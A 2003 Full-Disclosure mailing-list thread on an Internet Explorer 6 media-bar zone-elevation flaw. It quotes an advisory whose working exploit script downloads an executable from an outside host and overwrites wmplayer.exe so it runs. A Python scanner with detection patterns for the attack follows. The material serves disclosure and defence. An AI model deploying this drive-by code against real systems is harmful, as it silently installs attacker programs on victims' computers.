Do you have any suggestions of feature(s) that can be turned off in Windows or Internet Explorer that will prevent this exploit from working? I'm mostly interested in some feature that wouldn't typically be used on a Web page. It's also not necessary for there to be a UI to turn a feature on or off. A hidden registry setting is fine.
Also, Internet Explorer has an option for turning off sounds in Web pages. If sounds are turned off in IE, will this exploit still work?

Thanks,
Richard

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of jelmer
Sent: Thursday, September 11, 2003 6:32 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

Internet explorer 6 on windows XP allows execution of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a series of advisories concerning internet explorer. By combining one of these issues with an earlier issue I myself reported a while back, you can construct a specially crafted webpage that can take any action on a user's system including, but not limited to, installing trojans, keyloggers, wiping the user's harddrive etc.

TECHNICAL EXPLANATION :

Internet explorer 6 comes with a media sidebar in which you can load and play mediaclips without even leaving the browser. When you instruct the mediabar to load a file from an unknown host, or the HTTP status returned by an existing host indicates an error, this media bar displays an error page inside the media bar, namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URL's are treated as being in the "my computer zone" and are loaded from the user's filesystem: perfect conditions for the issue I describe on
http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html
to work.

Now all that is needed is a way to inject this exploit code into this page. This method was graciously provided by Liu Die Yu, as you can read on
http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') {
      result += line +'\\r\\n';
    }
  }
  return result;
}
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>

DEMONSTRATION :

A demonstration is provided at :
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another browser such as the excellent mozilla firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
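The advisory above names a small set of indicators that a page abusing this media-bar / res: zone-elevation chain tends to carry: a `window.open` call targeting the `_media` frame, a `file:javascript:` URL, a `res://` reference to a local DLL resource page, and the `ADODB.Stream` / `SaveToFile` write-to-disk primitive. The following is an added example, not part of the thread and not code from either poster: a heuristic content scanner, the kind of thing a proxy or mail gateway filter could run over fetched HTML to flag pages matching that pattern. The indicator list, the function names (`scan_html`, `risk_score`, `classify`) and the two sample documents are all constructed for this example.

```python
"""Heuristic scanner for the IE6 media-bar / res: zone-elevation pattern.

Added example (not from the advisory). It flags HTML that combines the
indicators the advisory describes; each indicator alone is only a hint,
so the classification is driven by how many *distinct* indicators appear.
"""
import re

# (compiled pattern, human-readable label) -- constructed from the advisory text.
INDICATORS = [
    (re.compile(r'file\s*:\s*javascript\s*:', re.I),
     "file:javascript: URL (script injected into the My Computer zone)"),
    (re.compile(r'window\.open\s*\([^)]*["\']_media["\']', re.I),
     "window.open targeting the _media (media bar) frame"),
    (re.compile(r'res://', re.I),
     "res: protocol reference (local DLL resource page)"),
    (re.compile(r'ActiveXObject\s*\(\s*["\']ADODB\.Stream["\']', re.I),
     "ADODB.Stream instantiation (write-to-disk primitive)"),
    (re.compile(r'\.SaveToFile\s*\(', re.I),
     "SaveToFile call (drops a file on the local filesystem)"),
]


def scan_html(html):
    """Return one finding per (line, indicator) hit: {'line': n, 'indicator': label}."""
    findings = []
    for lineno, line in enumerate(html.splitlines(), start=1):
        for pattern, label in INDICATORS:
            if pattern.search(line):
                findings.append({"line": lineno, "indicator": label})
    return findings


def risk_score(findings):
    """Number of distinct indicators seen; repeats of the same one do not add weight."""
    return len({f["indicator"] for f in findings})


def classify(html):
    """'high' when three or more distinct indicators co-occur, 'suspicious' for
    one or two, 'clean' otherwise. Thresholds are an assumption for this example."""
    score = risk_score(scan_html(html))
    if score >= 3:
        return "high"
    if score >= 1:
        return "suspicious"
    return "clean"


# Constructed sample: mirrors the structure the advisory describes (not a working page).
SAMPLE_MALICIOUS = """<html><body>
<textarea id="code" style="display:none;">
var s = new ActiveXObject("ADODB.Stream");
</textarea>
<script>
window.open("error.jsp", "_media");
function doit() {
  var u = "file:javascript:eval('" + document.all.code.value + "')";
  window.open(u, "_media");
}
setTimeout("doit()", 5000);
</script>
</body></html>"""

# Constructed sample: ordinary page that opens a help window in a new tab.
SAMPLE_BENIGN = """<html><body>
<script>
  function openHelp() { window.open("help.htm", "_blank"); }
</script>
<a href="javascript:openHelp()">Help</a>
</body></html>"""


if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = scan_html(doc)
        print(f"{name}: {classify(doc)} ({risk_score(hits)} distinct indicators)")
        for h in hits:
            print(f"  line {h['line']}: {h['indicator']}")
```

The scanner works on the page as served, so it does not see the `_media` window or the error-page redirect at runtime; that is exactly why it looks for the *combination* of indicators rather than any one of them, since `res://` or `window.open` on their own are common in legitimate content. A stricter filter can simply refuse any response containing `file:javascript:`, which has no legitimate use in a web page.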
